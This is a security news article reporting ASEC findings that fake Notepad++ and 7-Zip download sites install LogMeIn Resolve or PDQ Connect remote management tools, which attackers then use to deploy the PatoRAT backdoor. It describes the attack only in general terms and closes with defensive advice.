Cybercriminals are increasingly distributing malicious Remote Monitoring and Management (RMM) tools through fake websites that mimic popular software download pages.
These deceptive sites impersonate legitimate utilities like Notepad++ and 7-Zip, tricking users into installing remote access tools such as LogMeIn Resolve instead of the software they intended to download.
Once installed, these RMM tools allow attackers to seize full control of infected systems, execute commands remotely, and deploy additional malware payloads like PatoRAT.
The attack begins when users land on fraudulent download pages, often through advertisements or search engine manipulation.
These websites closely replicate the appearance and layout of official software distribution sites, making detection difficult for average users.
When visitors attempt to download Notepad++ or 7-Zip, the fake sites deliver LogMeIn Resolve or PDQ Connect—legitimate remote management tools that attackers repurpose for malicious objectives.
These tools register with their respective infrastructures upon installation, establishing a persistent connection that threat actors exploit to maintain access.
ASEC analysts identified a significant increase in attacks leveraging RMM tools during the initial infection phase.
Unlike traditional malware, these legitimate remote control applications often evade detection by antivirus software, presenting a serious challenge for security teams.
.webp "Threat Actors Using Fake Notepad++ and 7-zip Websites to Deploy Remote Monitoring Tools 3")
The researchers documented cases where attackers deployed both LogMeIn Resolve and PDQ Connect to execute PowerShell commands and install backdoor malware, creating multiple pathways for system compromise and data theft.
Infection Mechanism and Remote Access Deployment
The infection process relies on social engineering tactics that exploit user trust in familiar software brands. Fake websites display convincing download buttons, version numbers, and installation options that mirror legitimate pages.
When users execute the downloaded installer, they unknowingly install LogMeIn Resolve or PDQ Connect instead of the expected utility.
These RMM tools offer features such as remote support, patch management, and system monitoring—capabilities designed for IT administrators but weaponized by attackers for unauthorized access.
After installation completes, the RMM tools register with their cloud-based management infrastructure, enabling attackers to connect remotely without additional authentication.
The threat actors then execute PowerShell commands through the RMM interface to download and install PatoRAT, a backdoor that provides persistent access even if the RMM tool is later removed.
This multi-stage approach ensures continued control over compromised systems and allows attackers to deploy ransomware, steal credentials, or establish footholds in corporate networks.
.webp "Threat Actors Using Fake Notepad++ and 7-zip Websites to Deploy Remote Monitoring Tools 4")
Users should only download software from official websites and verify digital signatures and certificates before installation.
Organizations should implement endpoint detection and response solutions capable of monitoring RMM tool activity and identifying suspicious remote access patterns that indicate potential compromise.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
